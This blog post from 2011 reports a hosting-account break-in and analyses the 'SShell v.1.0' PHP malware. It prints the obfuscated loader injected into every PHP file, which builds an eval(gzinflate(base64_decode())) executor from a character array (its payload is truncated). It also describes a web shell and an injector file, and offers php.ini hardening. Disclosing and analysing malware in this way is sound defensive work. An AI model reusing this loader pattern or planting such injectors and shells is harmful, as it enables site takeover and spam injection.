Malware Alert - September 2011 - SShell v.1.0

I was very unfortunate to discover today that someone has breached into my hosting account. This has happened in one of the last few days, but remained unnoticed by me until today.

All of my PHP files were infected with the following piece of code:

<?php  
$md5 = "f8037bfb868e6c652d88c420b78404cd";
$wp_salt = array("(","i","4","o","e",'f','v','l',"$",'z',"r",'6','t',"c","g","n",')','b','s',"d",";",'_','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[4].$wp_salt[6].$wp_salt[22].$wp_salt[7].$wp_salt[0].$wp_salt[14].$wp_salt[9].$wp_salt[1].$wp_salt[15].$wp_salt[5].$wp_salt[7].$wp_salt[22].$wp_salt[12].$wp_salt[4].$wp_salt[0].$wp_salt[17].$wp_salt[22].$wp_salt[18].$wp_salt[4].$wp_salt[11].$wp_salt[2].$wp_salt[21].$wp_salt[19].$wp_salt[4].$wp_salt[13].$wp_salt[3].$wp_salt[19].$wp_salt[4].$wp_salt[0].$wp_salt[8].$wp_salt[6].$wp_salt[16].$wp_salt[16].$wp_salt[16].$wp_salt[20]);
$wp_add_filter('FZhHsoXIkkSX8+sbA+Cira0HaK01kza01prV96sdZGaEux/P8kqHf+qvnaohPcp/snQvcfT/ijKfi/Kf/...');
?>

I was really upset. Doing a search on Google for similar complaints, I found this report at Stack Overflow: LINK

A guy over there linked to an article at PHP-Beginners.com for more details: LINK

The guys at PHP Beginners were kind enough to share a cleaner script that removes the malicious code from your PHP files and although it did a great job, that wasn't enough for me - I was really, really upset that the security of my hosting account was compromised, so I decided to dig deeper into the problem. Examining my error logs and all the raw access logs associated with my hosting account, I discovered a good amount of suspicious files in the "wp-content" folder of my WordPress installation and in the "cgi-bin" folder of an old video sharing website I've developed last year, but that's no longer active.

I downloaded those and started to reverse engineer the whole thing, extensively using the help of these two great tools: PHP Decoder and PHP Formatter

It's worth mentioning here, that I ended up using these two, because I figured out that the whole:

<?php  
$wp_salt = array("(","i","4","o","e",'f','v','l',"$",'z',"r",'6','t',"c","g","n",')','b','s',"d",";",'_','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[4].$wp_salt[6].$wp_salt[22].$wp_salt[7].$wp_salt[0].$wp_salt[14].$wp_salt[9].$wp_salt[1].$wp_salt[15].$wp_salt[5].$wp_salt[7].$wp_salt[22].$wp_salt[12].$wp_salt[4].$wp_salt[0].$wp_salt[17].$wp_salt[22].$wp_salt[18].$wp_salt[4].$wp_salt[11].$wp_salt[2].$wp_salt[21].$wp_salt[19].$wp_salt[4].$wp_salt[13].$wp_salt[3].$wp_salt[19].$wp_salt[4].$wp_salt[0].$wp_salt[8].$wp_salt[6].$wp_salt[16].$wp_salt[16].$wp_salt[16].$wp_salt[20]);
$wp_add_filter('FZhHsoXIkkSX8+sbA+Cira0HaK01kza01prV96sdZGaEux/P8kqHf+qvnaohPcp/snQvcfT/ijKfi/Kf/...');
?>

...thing is actually an encrypted way of executing nested eval(gzinflate(base64_decode('SOME_BASE64_ENCODED_STRING')))); instructions. Here is the entire decrypted piece of malicious code that's inserted into each PHP file on your server: LINK

So the malicious code injected into my PHP files was basically making use of PHP's output buffering functionality, so it looks like it altered the output of my scripts, adding a handful of malicious links to all of them. (By the way I keep a list of all the links, if anyone's interested in acquiring it) This code also refered to one of the files placed in the "cgi-bin" folder of that old video sharing website, so I immediately started decrypting all my findings and here's what I got: LINK

To my dismay, it turned out that the virus can do much more harm than what it looked like. It turned out that one of the malware files in the "cgi-bin" folder is a shell script that gives the hackers full access to the server. It allows them to browse through your files, acquire access to your databases, FTP credentials, execute malicious pieces of PHP code and pretty much do anything they want...

The "wp-content" folder contained almost the same files as the "cgi-bin" folder. However, there's an additional file called "wp-thumb-creator.php". I was terrified when I saw its decrypted code LINK as this was the file that did all the injection. It seems to have some connection with ydmns1.com, which is hosted somewhere in Germany, so it's either Germans standing behind the attack or a machine in Germany is exploited and used by the hackers...

Anyway, that whole thing seems to be called !SShell v. 1.0 shadow edition!, so please spread the word about it and help other people protect themselves from it. Although the cleaner script that the PHP-Beginners.com guys supplied does a great job, you won't stop this thing from happening again, unless you discover and delete the SShell file and the "wp-thumb-creator.php" file that injects the malicious code into all of your PHP files. You may also want to add the following line to your php.ini file as a preventive measure, so even if you get infected again, their code won't be able to work:

disable_functions = create_function,gzinflate,base64_decode

It looks like the mass attacks with this malware started this month (September 2011), as I see a growing number of people complaining about it. It looks like !SShell v. 1.0 shadow edition! is actually a modified version of the Russian c99madshell script, full info on which can be found here: LINK

Marin Bezhanov

Marin Bezhanov


Read more posts by this author.

 

You may also like

    Comments powered by Disqus